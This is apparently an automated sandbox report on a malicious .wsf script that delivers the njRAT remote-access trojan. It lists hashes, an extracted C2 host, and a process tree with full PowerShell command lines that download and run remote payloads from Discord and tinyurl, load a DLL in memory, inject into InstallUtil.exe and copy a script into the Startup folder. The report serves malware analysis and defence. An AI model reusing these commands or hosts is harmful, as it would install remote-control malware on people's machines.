Analysis
-
max time kernel
298s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2022 20:23
Static task
static1
Behavioral task
behavioral1
Sample
0f35bfed5b1817310378a5df58ca5fcd.wsf
Resource
win7-20220812-en
General
-
Target
0f35bfed5b1817310378a5df58ca5fcd.wsf
-
Size
84KB
-
MD5
0f35bfed5b1817310378a5df58ca5fcd
-
SHA1
3062b699b4944f3e70ee80127fe760a68fb3f453
-
SHA256
bc07c50c0b92825bf9436f7a6816bd86c54f827c00c87304b63ff67ee05e695d
-
SHA512
c14007ae998ac0bfa7816f314e0c42919c820651e327eb67f6c182e2bd2b0aa2fdef64d6b7f7f51471e6f4903a4e632d354bed5a49ad5f411801857abfc3e9c0
-
SSDEEP
48:4sLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLG:tiJZ
Malware Config
Extracted
https://tinyurl.com/2erph6cs
Extracted
njrat
0.7NC
NYAN CAT
dnsproxi2022.duckdns.org:1986
6beb218c1e6044f785a
-
reg_key
6beb218c1e6044f785a
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 2 5052 powershell.exe 12 4328 powershell.exe 14 4328 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4328 set thread context of 3692 4328 powershell.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5052 powershell.exe 5052 powershell.exe 3100 powershell.exe 3100 powershell.exe 4328 powershell.exe 4328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe Token: 33 3692 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3692 InstallUtil.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1684 wrote to memory of 5052 1684 WScript.exe 82 PID 1684 wrote to memory of 5052 1684 WScript.exe 82 PID 5052 wrote to memory of 3636 5052 powershell.exe 84 PID 5052 wrote to memory of 3636 5052 powershell.exe 84 PID 3124 wrote to memory of 1492 3124 explorer.exe 86 PID 3124 wrote to memory of 1492 3124 explorer.exe 86 PID 1492 wrote to memory of 3100 1492 WScript.exe 87 PID 1492 wrote to memory of 3100 1492 WScript.exe 87 PID 3100 wrote to memory of 4328 3100 powershell.exe 89 PID 3100 wrote to memory of 4328 3100 powershell.exe 89 PID 4328 wrote to memory of 3692 4328 powershell.exe 92 PID 4328 wrote to memory of 3692 4328 powershell.exe 92 PID 4328 wrote to memory of 3692 4328 powershell.exe 92 PID 4328 wrote to memory of 3692 4328 powershell.exe 92 PID 4328 wrote to memory of 3692 4328 powershell.exe 92 PID 4328 wrote to memory of 3692 4328 powershell.exe 92 PID 4328 wrote to memory of 3692 4328 powershell.exe 92 PID 4328 wrote to memory of 3692 4328 powershell.exe 92
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f35bfed5b1817310378a5df58ca5fcd.wsf"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1024684238085312517/1026668711156928603/Crpted.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('El presente es el requerimiento enviado a declarar por el proceso 0091-002018-0917875 .wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\дÑÑвПЙ.wsf');Start-Sleep 1;rm *.uue,*.pif2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs3⤵PID:3636
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAC⌚⌚⌚AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQAaQBuAHkAdQByAGwALgBjAG8AbQAvADIAZQByAHAAaAA2AGMAcwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMAAxADMAMABpAHYAbgBlAC8ANAAxADYAMwA2ADMANQA1ADAANAAwADYAOAA2ADYANgAyADAAMQAvADcAMQA1ADIAMQAzAD⌚⌚⌚AOAAwADgAMwAyADQAOAA2ADQAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAFIAbwBkAGEAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = '%%';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0130ivne/4163635504068666201/7152135808324864201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'Roda' ))"4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD50ff7e1af4cc86e108eef582452b35523
SHA1c2ccf2811d56c3a3a58dced2b07f95076c6b5b96
SHA25662ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0
SHA512374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937
-
Filesize
1KB
MD5d7b5fc204bea26e27b5dad3fde21bb2f
SHA1acc420ea5b24aecf437ec99ebe7002a8569833bd
SHA256ebea730291a8e997962079cad97c2ee9b159f74b96ea22c49548c4b3f0da279d
SHA5127c5bb43f40ae7b8c8baa6c52e6f70a17b320c90b9a36d72df979fb75dbd5c4fe1e797d40a54e21aa41e844e690e6b9fb46a09f51dc4fd0d3d9fd8f59693a1fc7
-
Filesize
201KB
MD546306c9f94abfaca3a6409d80636075e
SHA1adf4b0875ff61448d689a786066ac12f97b065dc
SHA2564df9ac8599d0ff50d464df2887feea99f6c8c13105cc33c4d5554d41f5c7442b
SHA512589ef5c79a272a1575d672bf60547e742f2d55181d8561f39b09517b678e0beb46abb3a1450d41e6224ea0c75bd52ab49a3e630fbb371a6e9c6d23e26b534a76